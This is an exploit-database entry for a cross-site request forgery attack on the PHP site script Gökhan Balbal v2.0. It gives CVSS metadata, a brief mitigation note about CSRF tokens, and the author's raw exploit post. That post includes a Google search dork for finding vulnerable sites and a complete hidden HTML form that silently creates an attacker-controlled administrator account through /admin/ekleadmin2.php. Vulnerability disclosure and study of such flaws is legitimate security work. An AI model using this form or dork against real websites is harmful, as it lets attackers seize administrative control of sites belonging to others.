Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin)

vendor:

Gökhan Balbal

by:

KnocKout

8,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Gökhan Balbal

Affected Version From: v2.0

Affected Version To: v2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:wmscripti:gokhan_balbal

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin)

Gökhan Balbal v2.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML page that contains a form with hidden fields that when submitted, will add an admin user to the application. The malicious page can be hosted on a website or sent via email to a user of the application. When the user visits the malicious page, the form will be automatically submitted and the attacker will gain admin access to the application.

Mitigation:

To mitigate CSRF attacks, the application should implement a CSRF token that is unique to each user session. The token should be included in all forms and requests and should be validated on the server side.

Source

Exploit-DB raw data:

                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
Gökhan Balbal v2.0  => Cross-Site Request Forgery Exploit (Add Admin)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Þeker Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
					  KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Gökhan Balbal
|~Affected Version : v2.0
|~Software  : http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html
|~RISK : High
|~Google Keyword :  "DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi"

##################++ Exploit ++ ######################################

 <html>
  <body>
    <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
      <input type="hidden" name="kadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

############################################################